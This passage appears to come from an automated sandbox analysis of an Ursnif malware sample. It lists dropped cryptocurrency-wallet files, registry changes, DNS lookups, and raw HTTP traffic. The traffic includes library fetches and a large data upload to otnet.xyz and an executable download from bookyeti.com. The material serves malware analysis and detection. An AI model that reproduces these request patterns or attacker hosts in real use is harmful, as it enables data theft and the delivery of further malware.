- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MinCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\MultiDoge",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\NameCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\PrimeCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\TerraCoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\YACoin",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets\\Zcash",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\files\\Wallets",
- "C:\\ProgramData\\M08AFZ7ZYI81116E3YF1B1L1B\\CA_00000000-0000-0000-0000-0000000000009437374709.zip",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Ursnif_6cc70fb7b014fe253989338d5008381d.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBC62.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFBE.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERBFDE.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC713.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_048e8456\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "otnet.xyz",
- "answers":
- "data": "209.141.47.33",
- "type": "A"
- "type": "A",
- "request": "ip-api.com",
- "answers":
- "data": "72.11.140.50",
- "type": "A"
- "data": "66.212.29.250",
- "type": "A"
- "type": "A",
- "request": "bookyeti.com",
- "answers":
- "data": "199.204.213.10",
- "type": "A"
- * Domains:
- "ip": "209.141.47.33",
- "domain": "otnet.xyz"
- "ip": "72.11.140.50",
- "domain": "ip-api.com"
- "ip": "199.204.213.10",
- "domain": "bookyeti.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://otnet.xyz/141",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/141",
- "data": "POST /141 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll",
- "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/freebl3.dll?ddosprotected=1",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/freebl3.dll?ddosprotected=1",
- "data": "GET /freebl3.dll?ddosprotected=1 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/mozglue.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/mozglue.dll",
- "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/msvcp140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/msvcp140.dll",
- "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/nss3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/nss3.dll",
- "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/softokn3.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/softokn3.dll",
- "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 2,
- "body": "",
- "uri": "http://otnet.xyz/vcruntime140.dll",
- "user-agent": "",
- "method": "GET",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/vcruntime140.dll",
- "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "--1BEF0A57BE110FD467A--\r\n",
- "uri": "http://ip-api.com/line/",
- "user-agent": "",
- "method": "POST",
- "host": "ip-api.com",
- "version": "1.1",
- "path": "/line/",
- "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://otnet.xyz/",
- "user-agent": "",
- "method": "POST",
- "host": "otnet.xyz",
- "version": "1.1",
- "path": "/",
- "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 40781\r\nHost: otnet.xyz\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nCookie: DFSCOOK=c5528e4cb61f70e4c428633d5104ff7f\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://bookyeti.com/img/3001.exe",
- "user-agent": "",
- "method": "GET",
- "host": "bookyeti.com",
- "version": "1.1",
- "path": "/img/3001.exe",
- "data": "GET /img/3001.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: bookyeti.com\r\nConnection: Keep-Alive\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: